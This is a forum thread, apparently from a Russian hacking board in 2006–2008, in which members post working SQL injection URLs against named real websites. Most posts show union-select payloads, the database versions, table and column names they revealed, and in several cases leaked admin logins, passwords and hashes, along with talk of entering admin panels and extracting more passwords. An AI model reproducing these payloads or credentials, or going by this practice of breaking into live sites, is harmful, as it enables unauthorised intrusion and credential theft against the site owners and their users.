SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Климент_Ворошилов

    Code:
    _http://www.fishery.ru/
    _http://www.fishery.ru/news/index.php?id=11687#11687
    _http://www.fishery.ru/news/index.php?id=11687%27#11687
    _http://www.fishery.ru/news/index.php?id=11687+order+by+7/*#11687
    _http://www.fishery.ru/news/index.php?id=-11687+union+select+1,2,3,4,5,6,7/*#11687
    _http://www.fishery.ru/news/index.php?id=11687+union+select+1,database(),user(),4,5,version(),7/*#11687
    
    database - fishery
    user - fishery@localhost
    version - 5.0.45-community-log
    
    23:catalogcontent
    23:--1:user
    23:--2:pswd
    23:--3:companyname
    23:--4:postaddress
    23:--5:address
    23:--6:phone
    23:--7:fax
    23:--8:city
    23:--9:email
    23:--10:namedomain
    23:--11:contactname
    23:--12:comment
    23:--13:file1
    23:--14:file2
    23:--15:url
    23:--16:file3
    23:--17:file1name
    23:--18:file2name
    23:--19:file3name
    23:--20:file1desc
    23:--21:file2desc
    23:--22:file3desc
    23:--23:file1date
    23:--24:file2date
    23:--25:file3date
    23:--26:file1size
    23:--27:file2size
    23:--28:file3size
    23:--29:file1count
    23:--30:file2count
    23:--31:file3count
    23:--32:viewcat
    23:--33:viewsite
    23:--34:uid
    23:--35:subscribe
    23:--36:created
    23:--37:money_amount
    23:--38:enabled
    
    
    26:forums_auth
    26:--1:sess_id
    26:--2:name
    26:--3:username
    26:--4:password
    26:--5:email
    26:--6:webpage
    26:--7:image
    26:--8:icq
    26:--9:aol
    26:--10:yahoo
    26:--11:msn
    26:--12:jabber
    26:--13:signature
    
    first ten:
    
    first 10 from the forum.
    
    
     
  2. .acme

    doesn't seem to be a repost.
     
  3. lexa007

    HTML:
      http://www.satdv.net.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
    
    http://www.aloris.ru/http://www.tatshop.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
    
    http://kneparhia.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
    
    http://support.gateway.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
    
    http://glasstable.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
    
       
     
  4. MaSter GeN

    http://www.usms.org/articles/articledisplay.php?a=-150'+union+select+1,2,3,4,5,6,7,8,9/*
    name=usms_main
    dbver=5.0.27-standard
    [email protected]
    never did manage to get the tables :)
     
  5. ZipaCna

    My first SQLi in this thread:

    http://www.speedguide.net/read_articles.php?id=-174+union+select+1,2,concat(user,password),4,5+from+mysql.user--
     
  6. desTiny

    TARGET:
    Code:
    http://www.fnm.msu.ru
    VULNERABILITY:
    Code:
    BLIND SQL INJ
    WHERE:
    Code:
    http://www.fnm.msu.ru/main.php?topic=1 and 1=1
    SPECIAL CHARACTER ESCAPING:
    Code:
    YES
    MySQL VERSION:
    Code:
    5.0.24a-Debian_9-log
    INFORMATION_SCHEMA PRESENT:
    Code:
    YES
    TABLES:
    Code:
    CHARACTER_SETS
    COLLATIONS
    COLLATION_CHARACTER_SET_APPLICABILITY
    COLUMNS
    COLUMN_PRIVILEGES
    KEY_COLUMN_USAGE
    ROUTINES
    SCHEMATA
    SCHEMA_PRIVILEGES
    STATISTICS
    TABLES
    TABLE_CONSTRAINTS
    TABLE_PRIVILEGES
    TRIGGERS
    USER_PRIVILEGES
    VIEWS
    doc_folders
    documents
    indexim
    sessions
    subtopics
    topics
    users
    The rest is up to you =)
     
  7. .acme

    not a repost :)
     
  8. truelamer

    http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+null,version(),null,4,null,null,null,null,null,null,null,null,null,null,null,null,null,null--

    PostgreSQL 7.4.7 on i386-portbld-freebsd5.3, compiled by GCC cc (GCC) 3.4.2 [FreeBSD] 20040728

    http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables+--

    it outputs a lot of interesting stuff, but I chose pg_user

    http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+null,COLUMN_NAME,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+information_schema.columns+where+table_name=(select+TABLE_NAME+from+information_schema.tables+limit+1+offset+43)--

    result:

    usecatupd
    usesuper
    usecreatedb
    usename
    usesysid
    passwd
    valuntil
    useconfig

    http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+null,usename,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+pg_user--

    http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+null,passwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+pg_user--


    the first one is the admin
    login: postgres
    pass: ********

    So here is the real question: how do I actually pull the passwords out? I even tried changing the field type from hide, but somehow I can't... unless I change the e-mail and use password recovery....
     
  9. vp$

    www.tungus.ru

    Code:
    http://www.tungus.ru/views.php?id=791000+union+select+1,2,3,concat_ws(0x3a,user,pass),5,6,7,8+from+users/*
    bwahaha, look at the image properties
    nitros911:ujkfz;jgf голаяжопа :D
    go to the admin panel
    http://www.tungus.ru/admin.php that's right, and we admin it

    a pile of desktop wallpapers, 250 MB to download
     
  10. truelamer

    http://www.kalm.ru/ru/docs_view.php?id=-1+union+select+1,2,3,4,concat(version(),char(58),database(),char(58),user()),6,7,8+--

    4.0.16-log
    kalm_ru
    kalm@localhost
     
  11. cash$$$

    VERSION: 4.1.20
    DATABASE: iwdp
    USER: iwdp@localhost


    VERSION: 5.0.24a-log
    DATABASE: d60350056
    USER: u70382875@cgihost
     
  12. Kakoytoxaker

    2 cash$$$
    Two reposts
    _http://forum.antichat.ru/showpost.php?p=594249&postcount=981
    _http://forum.antichat.ru/showpost.php?p=577278&postcount=4680
     
  13. MaSter GeN

    tennis player rankings
    Code:
    http://www.atptennis.com/3/en/players/playerprofiles/?playernumber=D643'

    enumerating the tables

    Code:
    http://www.atptennis.com/3/en/players/playerprofiles/?playernumber=D643'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('plyrbioHTML','ContestInfo_bak','rankdates','SQLINJECTION','rankmast','RollingRank','sglbest14','PlayerEquip','sglbest14roll','sglmtchfact','PlayerEquip_backup','ClipBTournEntryPossibles','cntrymast','cntrymast_Latino','ContestInfo','dblbest14','dblbest14roll','dblno1plyr','dblrndrsl','dblrndrslXX','dbltrnrsl','dbltrnrslroll','dblwinstreak','dtproperties','DW_EventHistoryByTrnYearTrnNum','DW_SglRaceRankByCountry','emailtemp','ENTY_PlayerProperty'))
    was too lazy to go through all of them
    Code:
    plyrbioHTML',
    'ContestInfo_bak',
    'rankdates'
    ,'SQLINJECTION',
    'rankmast','RollingRank',
    'sglbest14','PlayerEquip',
    'sglbest14roll','sglmtchfact',
    'PlayerEquip_backup',
    'ClipBTournEntryPossibles',
    'cntrymast','cntrymast_Latino',
    'ContestInfo',
    'dblbest14',
    'dblbest14roll',
    'dblno1plyr','dblrndrsl',
    'dblrndrslXX'
    ,'dbltrnrsl','dbltrnrslroll',
    'dblwinstreak',
    'dtproperties','DW_EventHistoryByTrnYearTrnNum',
    'DW_SglRaceRankByCountry'
    ,'emailtemp'
    ,'ENTY_PlayerProperty
    
    take a table and enumerate its columns, for example plyrbioHTML
    Code:
    http://www.atptennis.com/3/en/players/playerprofiles/?playernumber=D643'+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='plyrbioHTML'AND+COLUMN_NAME+NOT+IN+('plyrnum','lastupdate','updateind','biotext'))--
    find the column we need and output it, e.g. plyrnum
    Code:
    http://www.atptennis.com/3/en/players/playerprofiles/?playernumber=1'+or+1=(SELECT+TOP+1+plyrnum+FROM+plyrbioHTML)--
    we get 'A001'
    Whoever needs it, look for the admin panel; honestly I was just too lazy :D

    P.S. In the same place, the photo search box has an injection via a POST parameter, whichever is more convenient for you :)
     
    #5033 MaSter GeN, 10 Mar 2008
    Last edited: 10 Mar 2008
  14. nex0

    microstar.ru :)

    Code:
    http://www.microstar.ru/program/support/download/dld/spt_dld_detail.php?UID=459888+union+select+concat(version(),0x3a,user(),0x3a,database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18&kind=10
    version() 5.0.37-log
    user() microsta@localhost
    database() msi
    Code:
    http://www.microstar.ru/program/support/download/dld/spt_dld_detail.php?UID=459888+union+select+concat(user,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users
    Choose which of the admin panels you need)
    Code:
    http://microstar.ru/ssl/
    for MSI WWW Admin admin:vscegths

    dailygrill.com
    Code:
    http://www.dailygrill.com/details.php?loid=999+union+select+1,2,3,4,5,6,7,8,9,10,concat(version(),0x3a,user(),0x3a,database()),12,13,14,15,16,17,18/*
    version() 4.1.20
    user() dailgrill@localhost
    database() dailygrill

    www.cameco.com
    Code:
    http://www.cameco.com/corporate_gov/board/directors/bio.php?diid=9999+union+select+1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6,7
    version() 4.0.24-log
    user() webuser@localhost
    database() cameco
    Code:
    http://www.cameco.com/corporate_gov/board/directors/bio.php?diid=9999+union+select+1,2,3,concat(user,0x3a,password),5,6,7+from+mysql.user
    Code:
    http://www.cameco.com/corporate_gov/board/directors/bio.php?diid=9999+union+select+1,2,3,concat(user_name,0x3a,user_password),5,6,7+from+users+limit+0,1
    admin:1112ff600dee3a15 - chicago
     
    #5034 nex0, 10 Mar 2008
    Last edited: 10 Mar 2008
  15. cash$$$

    VERSION: 5.0.41--log
    USER: [email protected]
    DATABASE: fantasiasexshop1

    VERSION: 4.1.22-standard
    USER: williamt@localhost
    DATABASE: williamt_wtdb

    admin_module
    admin_user_levels
    admin_user_module
    homepage
    magazine
    users
    yarn
     
  16. beerhack

    http://www.rhd.uz/forum_cont.php?uid=-99999+union+select+1,2,user(),version(),database()/*

    USER: [email protected]
    VERSION: log 5.0.45
    DATABASE: atumatu_rhd
     
  17. vp$

    www.tourtasmania.com PR4

    Code:
    http://tourtasmania.com/content.php?id=cygnet'+and+1=2+union+select+1,2,3,4,5,concat_ws(0x3a,database(),version(),user()),7/*
    justin_tourtas:4.1.20:justin_ttweb@localhost
    no standard tables

    www.alkamae.com PR3
    Code:
    http://www.alkamae.com/product.php?id=8500000+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,6,14,18,19,20,21,22+from+users+limit+0,1/*
    5.0.45-community:alkamae_content:alkamae_admin121@localhost
    Code:
    http://www.alkamae.com/product.php?id=8500000+union+select+1,concat_ws(0x3a,NAME,password,member_level),3,4,5,6,7,8,9,10,11,12,13,14,15,6,14,18,19,20,21,22+from+users+limit+0,1/*
    HEATHER:test:4
    but this doesn't work for the admin panel(
     
  18. je0n

    http://www.takayagolfcentre.com/
    Code:
    http://www.takayagolfcentre.com/gallery.php?album=3&image=-4+union+select+11111,concat_ws(0x3a,username,password)+from+users/*
    (output is in the image src)
    http://www.takayagolfcentre.com/admin/
    admin:takaya07

    avtorinok.ru
    (it's in the anti-repost list, but mine comes with admin rights for the forum)
    Code:
    http://www.avtorinok.ru/news/news_firms.php?id=-890+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.avtorinok.ru/forum/
    Andrey:welcome22
     
  19. heks

    je0n
    just don't put iframes on hacked sites so that Antichat members catch viruses
     
  20. l1ght

    whoops)
    Code:
    http://ldpr.ru/iframe.php?page=bzone_banners&pid=-1+union+select+1,1,3,1,1+from+information_schema.tables/*&content_id=1
     